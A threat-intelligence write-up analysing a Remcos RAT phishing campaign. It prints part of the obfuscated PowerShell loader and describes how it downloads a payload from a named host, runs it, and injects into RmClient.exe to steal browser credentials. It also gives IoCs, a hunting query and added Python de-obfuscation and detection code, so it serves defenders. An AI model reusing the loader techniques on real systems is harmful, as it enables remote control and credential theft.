
Fileless Remcos Attacks on the Rise 

Contributors: Veena Sagar, Niranjan Jayanand, Archana Manoharan

 

CyberProof researchers observed a spike in Remcos (Remote Control & Surveillance Software) campaigns in September and October 2025, spread through email and social engineering. Remcos is a commercial Remote Access Tool for remotely controlling computers. It is advertised as legitimate software for surveillance and penetration testing purposes but has been used in numerous hacking campaigns. Once installed, Remcos opens a backdoor on the device, granting the remote operator full access.

CyberProof Threat Researchers were able to understand how the attackers bypassed EDRs with highly obfuscated code while accessing browser information, by injecting Remcos code into RmClient.exe, a Microsoft-distributed file. The motivation behind these campaigns appears to be credential theft through opportunistic targeted attacks. We suspect the attackers also compromised some legitimate websites to host additional files in this operation. CyberProof will continue to monitor this campaign and will share any additional findings as updates to this article.

Technical Details 

Here is the sequence of events and the technical details of the most recent Remcos incident CyberProof Threat Researchers identified:

In this incident, a user received an email with an attachment named ‘EFEMMAK TURKEY INQUIRY ORDER NR 09162025.gz’.

Fig. 1: User tricked into downloading the attachment through the Edge browser (screenshot of the process tree of userinit.exe, explorer.exe and msedge.exe, highlighting the suspicious file)

This archive is extracted to drop a batch file at a path like: C:\Users\<username>\AppData\Local\Temp\00f764ae-38a7-46c6-9b3e-5131512535c7_EFEMMAK TURKEY INQUIRY ORDER NR 09162025 (2).gz.5c7\EFEMMAK TURKEY INQUIRY ORDER NR 09162025.bat

Fig. 2: The inner batch file (screenshot of the file details)

This batch file then executes an obfuscated PowerShell script that uses helper functions named ‘Lotusblo’ and ‘Garrots’, shown in the code snippet below.

Fig. 3: Launch of the PowerShell script from the batch file (screenshot of the process tree userinit.exe > explorer.exe > cmd.exe > powershell.exe, with file paths and process IDs)

(Script hash: 5cb34177d0289e9737e5a261b8d1aac227656b96c768f789d6fcc9bc20adb05e)

  1. The script starts a hidden PowerShell process, uses a custom string de-obfuscation function, and executes code dynamically through Invoke-Expression. It configures web requests to use TLS 1.2 and a custom User-Agent string. It then builds a target file path at C:\Users\<username>\AppData\Roaming\Hereni.Gen and attempts to download hxxps://icebergtbilisi.ge/Sluknin.afm to that path in a continuous loop, pausing 4 seconds between attempts, until the download succeeds. After a successful download, the script reads the file content, Base64-decodes it, and decompresses the result with GZip. The decompressed data stream object is then passed to Invoke-Expression, i.e. the retrieved payload is executed.

Below is the PowerShell code snippet that launches the next stage of the attack through msiexec.

 
powershell.exe -windowstyle hidden "spsv exergonic;function Lotusblo ($fremhvels){ $prci=3;do {$aaenaand+=$fremhvels[$prci];$prci+=4;$tradsti=Compare-Object vandfa fusela15}until (!$fremhvels[$prci])$aaenaand}function Garrots ($subflavou){.($realek) ($subflavou)}$nonex=Lotusblo '{{{N{{.E {{T{{{.{{{w';$nonex+=Lotusblo 'GGGeGG B,GGcGGGLGGGiGGGEGG n,GGt';$easinesses=Lotusblo ' ;;M ;;o ;;z;;;i ; l  ;l;;;a;;;/';$emball=Lotusblo 'P,PTPP.lPPPsPPP1PP 2';$unhastyu='iii[ii,NiiiE iiTiii.iiiSi,ieiiir iiV .iiiiiCiiieiiip iiOiiiiiiiniiit iim iiAiiin iiAiiigiiieiiiriii]iii:i,i:iiiS i,eiiiciiiu iiriiiiiiitii Y  ip i Rii.OiiitiiiO iiCii o iiliii=iii$iiiEii miiiBiiia iiL  il';$easinesses+=Lotusblo '…………………………………
…………..;$modific=Lotusblo 'S S>';$realek=Lotusblo ']] I ]]e ]]x';$home='john';$tineidsma='\Hereni.Gen';Garrots (Lotusblo ')
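To make the de-obfuscation concrete, here is an added Python re-implementation (not code from the original post or from CyberProof) of the script's Lotusblo routine, applied to the string literals quoted in the snippet above, together with a mirror of the Base64-then-GZip unwrapping that the loader applies to the downloaded file. The function and variable names are my own; the stage-2 sample blob is constructed for the demonstration and is not the real payload.

```python
import base64
import gzip

# String literals copied from the obfuscated command line in the write-up,
# keyed by the variable they are assigned to in the script.
OBFUSCATED = {
    "nonex_part1": "{{{N{{.E {{T{{{.{{{w",
    "nonex_part2": "GGGeGG B,GGcGGGLGGGiGGGEGG n,GGt",
    "easinesses":  " ;;M ;;o ;;z;;;i ; l  ;l;;;a;;;/",
    "emball":      "P,PTPP.lPPPsPPP1PP 2",
    "modific":     "S S>",
    "realek":      "]] I ]]e ]]x",
}


def lotusblo(s: str) -> str:
    """Re-implementation of the script's Lotusblo routine.

    The PowerShell loop sets $prci=3, appends $fremhvels[$prci], adds 4 and
    repeats until indexing runs past the end of the string (PowerShell returns
    $null there, which is falsy). The plaintext is therefore every fourth
    character starting at offset 3; the Compare-Object call is filler.
    """
    return s[3::4]


def decode_all(table=OBFUSCATED) -> dict:
    """Decode every quoted literal; the padding characters differ per string,
    so the scheme is recognisable by the fixed stride rather than by the filler."""
    return {name: lotusblo(value) for name, value in table.items()}


def reconstruct_webclient_type() -> str:
    """$nonex is built from two decoded halves; PowerShell type names are
    case-insensitive, so the mixed case is purely cosmetic obfuscation."""
    d = decode_all()
    return d["nonex_part1"] + d["nonex_part2"]


def decode_stage2(blob: str) -> str:
    """Mirror of the loader's handling of the downloaded file: Base64 decode,
    then GZip decompress, yielding the script text handed to Invoke-Expression."""
    return gzip.decompress(base64.b64decode(blob)).decode("utf-8")


def make_sample_blob(script: str) -> str:
    """Constructed sample wrapped the same way (GZip, then Base64) so the
    decoder can be exercised offline without any real payload."""
    return base64.b64encode(gzip.compress(script.encode("utf-8"))).decode("ascii")


if __name__ == "__main__":
    for name, plain in decode_all().items():
        print(f"{name:13s} -> {plain!r}")
    print("WebClient type :", reconstruct_webclient_type())
    sample = make_sample_blob("Write-Output 'constructed stage-2 sample'")
    print("stage-2 text   :", decode_stage2(sample))
```

Running it recovers `NET.w` + `eBcLiEnt` (New-Object Net.WebClient), `Mozilla/` (the start of the custom User-Agent), `Tls12`, `>` and `Iex`, which is why `Garrots` is simply a wrapper around Invoke-Expression. The same stride applies to the `$unhastyu` literal, which carries the TLS setting the write-up describes.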

This code launches msiexec.exe from powershell.exe, as shown below:

Fig. 4: PowerShell launches msiexec.exe (screenshot: powershell.exe created process msiexec.exe on Sep 16, 2025, with process ID 22848)

From the device timeline we see that msiexec.exe used process hollowing to inject itself into RmClient.exe.

Fig. 5: Defender alert on process injection of msiexec.exe into RmClient.exe (screenshot of the process tree powershell.exe > msiexec.exe > RmClient.exe accessing browser saved-password files, with alerts for possible theft of passwords and web browser information)

The injected code is Remcos RAT attempting to access browser saved-password files, which alerted the MDR, thanks to partial EDR alerts at this stage:

Fig. 6: Alert timeline shows partial alerts when browser files were touched 

The RmClient.exe seen in this incident (hash ‘8f6a3b111f6e0498cb677b175966175bfa53e58c9fb41ddb63c7b7568e24c760’) is a Microsoft-distributed binary:

Fig. 7: RmClient hash information from VirusTotal (screenshot of the analysis report for RmClient.exe showing no malicious activity detected, with file hashes and distribution details)

We pivoted on msiexec’s process ID to find additional activity:

Fig. 8: Executions initiated from msiexec.exe, by process ID, showing randomly named files dropped in the Temp directory (screenshot of the query and its results with file paths, process names and timestamps; a sensitive field is redacted)

Additionally, we reviewed the network connections initiated by msiexec.exe (by its process ID) and observed the connections below, including C2 URLs:

Fig. 9: msiexec making a remote connection (screenshot of the alert: msiexec.exe made an outbound connection to IP 89.238.176.5 on uncommon port 57864, flagged as T1095 and T1571; user information redacted)

Further investigation revealed more network connections launched by msiexec.exe. 

Fig 10: More network connections by msiexec (screenshot of the query results with Timestamp, ActionType and other connection columns; part of the query is highlighted in red)

Fig. 11: The above connection by msiexec was seen to fail

The images below show the GET request to the malicious C2 domain and the User-Agent used when retrieving the randomly named files.

(Screenshot: request/response log of a GET for a .bin file, with IP address, User-Agent, response code 200, server information and content type)
(Screenshot: HTTP GET request and response headers, including remote address and server response, for cbcbergbiltis.ge/Suknia.afm)

Hunting Query 

 
union DeviceEvents, DeviceProcessEvents
| where FileName contains "rmclient.exe"
| where ProcessCommandLine contains "AppData\\Local\\Temp"
| project Timestamp, FileName, FolderPath, ProcessCommandLine, InitiatingProcessFileName, InitiatingProcessParentFileName
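As an added example (not part of the original post or of CyberProof's tooling), the hunting logic above expressed in Python over a handful of constructed events: the same case-insensitive "contains" predicate as the KQL, plus a host match against the refanged IoC list from this article and the msiexec-on-uncommon-port pattern from Fig. 9. The Event class, its field names and the sample rows are assumptions made for the demonstration.

```python
import re
from dataclasses import dataclass

# Defanged network indicators from the write-up's IoC list.
DEFANGED_IOCS = [
    "Ablelifepurelife[.]ydns.eu",
    "ablelifepurelifebk[.]ydns.eu",
    "icebergtbilisi[.]ge",
]


def refang(indicator: str) -> str:
    """Convert a defanged indicator into a matchable, lower-cased hostname."""
    return indicator.replace("[.]", ".").lower()


IOC_HOSTS = {refang(i) for i in DEFANGED_IOCS}


@dataclass
class Event:
    """Minimal stand-in for a Defender device event row (constructed; field
    names follow the KQL columns used by the hunting query)."""
    event_id: str
    file_name: str
    folder_path: str
    process_command_line: str
    initiating_process_file_name: str
    remote_url: str = ""
    remote_port: int = 0


def matches_hunting_query(ev: Event) -> bool:
    """Same predicate as the KQL: FileName contains "rmclient.exe" and the
    command line contains AppData\\Local\\Temp. KQL 'contains' is
    case-insensitive, so both sides are lower-cased here."""
    return ("rmclient.exe" in ev.file_name.lower()
            and r"appdata\local\temp" in ev.process_command_line.lower())


def url_host(url: str) -> str:
    """Host part of a URL, tolerating defanged schemes such as hxxps://."""
    return re.sub(r"^[a-z]+://", "", url.lower()).split("/")[0]


def matches_ioc_host(ev: Event) -> bool:
    return bool(ev.remote_url) and url_host(ev.remote_url) in IOC_HOSTS


def msiexec_uncommon_port(ev: Event) -> bool:
    """msiexec.exe talking to a non-web port, as in Fig. 9 of the write-up."""
    return (ev.initiating_process_file_name.lower() == "msiexec.exe"
            and ev.remote_port not in (0, 80, 443))


def hunt(events):
    """Return (event_id, reason) for every event that trips one of the checks."""
    hits = []
    for ev in events:
        if matches_hunting_query(ev):
            hits.append((ev.event_id, "rmclient launched from Temp"))
        elif matches_ioc_host(ev):
            hits.append((ev.event_id, "contact with known IoC host"))
        elif msiexec_uncommon_port(ev):
            hits.append((ev.event_id, "msiexec outbound on uncommon port"))
    return hits


# Constructed sample events: e1, e3 and e4 should match; e2 and e5 should not.
SAMPLE_EVENTS = [
    Event("e1", "RmClient.exe", r"C:\Users\john\AppData\Local\Temp\RmClient.exe",
          r'"C:\Users\john\AppData\Local\Temp\RmClient.exe"', "msiexec.exe"),
    Event("e2", "RmClient.exe", r"C:\Program Files\Vendor\RmClient.exe",
          r'"C:\Program Files\Vendor\RmClient.exe"', "explorer.exe"),
    Event("e3", "powershell.exe", r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
          "powershell.exe -windowstyle hidden ...", "cmd.exe",
          remote_url="hxxps://icebergtbilisi.ge/Sluknin.afm", remote_port=443),
    Event("e4", "msiexec.exe", r"C:\Windows\System32\msiexec.exe", "msiexec.exe",
          "msiexec.exe", remote_port=57864),
    Event("e5", "msedge.exe", r"C:\Program Files\Microsoft\Edge\msedge.exe", "msedge.exe",
          "explorer.exe", remote_url="https://example.com/", remote_port=443),
]

if __name__ == "__main__":
    for event_id, reason in hunt(SAMPLE_EVENTS):
        print(event_id, reason)
```

The legitimate RmClient.exe in e2 is left alone because the query keys on the Temp launch path rather than on the binary, which is the point of the KQL: the image is a signed Microsoft file, so the file name alone is not a signal.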

The image below shows the hunting query above capturing the events related to this Remcos activity.

Fig. 11: Our hunting query captures events related to injected RMClient launched by msiexec 

Configuration file 

The image below shows the configuration extracted by tria.ge, which classifies the file as Remcos RAT.

(Screenshot: tria.ge configuration extraction showing the software family)

Indicators of Compromise

  • Ablelifepurelife[.]ydns.eu 
  • ablelifepurelifebk[.]ydns.eu 
  • icebergtbilisi[.]ge 
  • Email attachment name: EFEMMAK TURKEY INQUIRY ORDER NR 09162025.gz 
  • Attachment hash: 5eb460204cd0f5510b146b8465b4392e9d0795b5d7fdb51b1c1429f97593a4b3 
  • Batch script file: EFEMMAK TURKEY INQUIRY ORDER NR 09162025.bat 
  • Script hash: 5cb34177d0289e9737e5a261b8d1aac227656b96c768f789d6fcc9bc20adb05e 
  • PowerShell content hash: 3ec5b13ee66d84dd75ac619ebb79c64cef7986dd6e8049f689f9ac39c272fea2 
  • Sluknin.afm 
  • LAUFENDES PROJEKT 092225 NORDRHEIN WESTFALEN CHARGE MATERIALIEN�MUSTEREINREICHUNG SOWIE ANGEBOTSANFRAGE.js 
  • ON GOING PROJECT 091704 SUBSEQUENT BATCH MATERIALS SAMPLE SUBMITTAL AS WELL AS QUOTATION REQUEST FOR ORDER.js 
  • PROJECTO EM CURSO 091704 LOTE LISBOA ENVIO DE MATERIAIS� AMOSTRAS E PEDIDO DE ORCAMENTO.bat 
  • Attn Zapytanie ofertowe 03-270123-0612 DODATKOWE DOSTAWY MAGAZYNU  ZAMOWIENIE 03-310123-0614.bat 

Recommendations 

  • Invest in Employee Training: Employees are often the first line of defense against cyber threats. Training staff to recognize phishing emails, suspicious links, and other common attack vectors is critical. Regularly updated cybersecurity training programs ensure employees stay aware of evolving threats and adhere to best practices.  
  • Leverage Advanced Platforms: Modern threat detection platforms equipped with real-time monitoring, AI-driven threat intelligence, and automated response mechanisms are indispensable. These tools enable organizations to detect and neutralize threats swiftly, minimizing potential damage.  
  • Perform Regular Audits: Routine evaluations of your cybersecurity framework help identify and address vulnerabilities. Audits also ensure compliance with regulatory standards and improve the overall robustness of your security posture. 

Conclusion 

Tracking the evolution of commodity malware and its use in global campaigns is difficult because of how frequently it is used. We highly recommend that organizations keep their security solutions updated. Threat hunting teams in particular must stay vigilant: upon successful infection, this commodity malware steals credentials that are later used for targeted attacks, which in multiple observed instances have delivered ransomware.

CyberProof’s Advanced Threat Hunting service covers the gaps that EDR detection misses, enabling MDR and detection engineering teams to stay ahead of such evolving malware attacks.